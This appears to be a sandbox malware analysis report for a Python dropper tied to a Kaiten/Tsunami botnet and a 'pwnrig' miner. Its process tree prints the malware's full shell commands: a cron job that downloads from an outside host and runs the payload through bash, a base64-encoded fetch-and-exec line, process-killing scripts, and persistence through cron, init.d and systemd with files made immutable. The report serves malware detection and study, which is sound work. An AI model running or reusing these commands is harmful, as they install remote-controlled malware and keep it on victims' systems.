Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
143s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20231222-en -
resource tags
-
submitted
15/02/2024, 23:17
General
-
Target
d.py
-
Size
2KB
-
MD5
2a8df33aa6948528816c4bb9b9a48752
-
SHA1
0dd5919d50cf6861985c3a1629d501c986876dd3
-
SHA256
e5062a17af9e778231b73f94099db13cefde1cbb2b5466e2234e2c5b75764c97
-
SHA512
6da29ea77cc85fd3766c6f4b8554ceea6f49d770854366d69d4a3c8709947e45128241c1e81a09761b76e5a2a6b67d54504aa9a55973fb01728428d75474b337
Score
10/10
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
-
Detects Kaiten/Tsunami payload 1 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Executes dropped EXE 5 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Attempts to change immutable files 14 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 11 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 1 TTPs 3 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies systemd 1 TTPs 3 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads CPU attributes 1 TTPs 15 IoCs
-
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Writes file to system bin folder 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
-
GoLang User-Agent 6 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes
-
/usr/bin/pythonpython /tmp/d.py1⤵
- Writes file to tmp directory
-
/usr/local/sbin/filefile /usr/bin/python2.72⤵
-
-
/usr/local/bin/filefile /usr/bin/python2.72⤵
-
-
/usr/sbin/filefile /usr/bin/python2.72⤵
-
-
/usr/bin/filefile /usr/bin/python2.72⤵
-
-
/bin/shsh -c "ps -ef | grep -v grep | grep klibsystem4 | awk '{print \$2}'"2⤵
-
/bin/psps -ef3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v grep3⤵
-
-
/bin/grepgrep klibsystem43⤵
-
-
/usr/bin/awkawk "{print \$2}"3⤵
-
-
-
/bin/shsh -c "sh -c \"ps -ef | grep -v bash | grep klibsystem4 | grep -v grep | wc -l\""2⤵
-
/bin/shsh -c "ps -ef | grep -v bash | grep klibsystem4 | grep -v grep | wc -l"3⤵
-
/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v bash4⤵
-
-
/bin/grepgrep klibsystem44⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
-
-
/bin/shsh -c "sh -c \"ps -ef | grep -v bash | grep klibsystem4 | grep -v grep | wc -l\""2⤵
-
/bin/shsh -c "ps -ef | grep -v bash | grep klibsystem4 | grep -v grep | wc -l"3⤵
-
/bin/grepgrep klibsystem44⤵
-
-
/bin/grepgrep -v bash4⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
/bin/psps -ef4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
-
/bin/shsh -c "/tmp/klibsystem4 1>/dev/null 2>&1 &"2⤵
-
-
/tmp/klibsystem4/tmp/klibsystem41⤵
- Executes dropped EXE
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/bashbash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"2⤵
-
/bin/rmrm -rf /etc/sysctl.conf3⤵
-
-
/sbin/sysctlsysctl -p3⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
-
/bin/cpcp -f -r -- /bin/knlib /bin/klibsystem43⤵
-
-
/usr/bin/nohupnohup ./klibsystem43⤵
-
-
/bin/rmrm -rf -- klibsystem43⤵
-
-
/bin/klibsystem4./klibsystem43⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵
-
-
/bin/systemctlsystemctl daemon-reload2⤵
-
-
/bin/systemctlsystemctl enable knlibe.service2⤵
-
-
/usr/bin/chattrchattr +ia /bin/knlib2⤵
-
-
/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/bin/ssss -ant2⤵
-
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"2⤵
-
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
-
/usr/bin/whoamiwhoami4⤵
-
-
/bin/hostnamehostname4⤵
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/bin/grepgrep /etc/cron4⤵
-
-
/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/idid -u4⤵
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/bin/grepgrep -v grep4⤵
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
-
/usr/bin/idid -u4⤵
-
-
-
-
/usr/bin/nohupnohup /tmp/bi.64 "&"1⤵
-
/tmp/bi.64/tmp/bi.64 "&"1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/bin/ssss -ant1⤵
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"1⤵
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/whoamiwhoami3⤵
-
-
/bin/hostnamehostname3⤵
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
-
/usr/bin/idid -u3⤵
-
-
/bin/grepgrep -v grep3⤵
-
-
/bin/grepgrep /etc/cron3⤵
-
-
/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
-
-
/bin/rmrm -rf /bin/bprofr3⤵
-
-
/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵
- Attempts to change immutable files
-
-
/bin/cpcp -f -r -- /tmp/bin.64 /bin/bprofr3⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
-
-
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr3⤵
- Attempts to change immutable files
-
-
/bin/rmrm -rf /bin/crondr3⤵
-
-
/bin/cpcp -f -r -- /tmp/bin.64 /bin/crondr3⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
-
-
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Attempts to change immutable files
- Creates/modifies Cron job
-
-
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich chkconfig3⤵
-
-
/usr/bin/whichwhich update-rc.d3⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/bin/systemctlsystemctl daemon-reload4⤵
-
-
-
/bin/rmrm -rf /bin/initdr3⤵
-
-
/bin/cpcp -f -r -- /tmp/bin.64 /bin/initdr3⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
-
-
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Attempts to change immutable files
- Modifies init.d
-
-
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/bin/systemctlsystemctl daemon-reload4⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/bin/systemctlsystemctl daemon-reload4⤵
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich systemctl3⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
-
-
/bin/rmrm -rf /bin/sysdr3⤵
-
-
/bin/cpcp -f -r -- /tmp/bin.64 /bin/sysdr3⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
-
-
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
-
-
/bin/systemctlsystemctl enable pwnrige.service3⤵
-
-
/bin/systemctlsystemctl enable pwnrigl.service3⤵
-
-
/bin/systemctlsystemctl daemon-reload3⤵
-
-
/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads runtime system information
-
-
-
/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/grepgrep "Port "1⤵
-
/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/bin/sedsed -e "s/\$//"1⤵
-
/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/bin/ssss -ant1⤵
-
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/bin/grepgrep "Port "1⤵
-
/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/bin/sedsed -e "s/\$//"1⤵
-
/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.8MB
MD5d843206f7d17f1dc46ad88d88a946fbc
SHA18b5c0d7021d7d95d3385618e7fdc253b12734898
SHA2564c14e691635ba32cf5b5131b331a1c390aad0da108c7a7f3db297e1562cec51a
SHA512e04da084c8f672fa27027a5055c0c3c7a13110998371484e10bfe733d4528cf50830ca079de65fb4e9be4e38d55ebe23b46ab75127442c24cd5da90b99825547
-
Filesize
182B
MD54847d0ba37990c8b3e81b82600e3759f
SHA125efb8e596a1cbcc0131b7ed85482b6c86e3fbd0
SHA2568f56f290451bc9a85fbcc7bd6cb605973ebb12412920d050d8be0d4666c8f73f
SHA512899ab30f716baf622cbc2d1c5dafd6a955df2583ec844bc7480257ee0eae0eef94564bd79c17f565d2d3c46a8697bcf7dea90fc03be1b1da2574a70635e93ed3
-
Filesize
179B
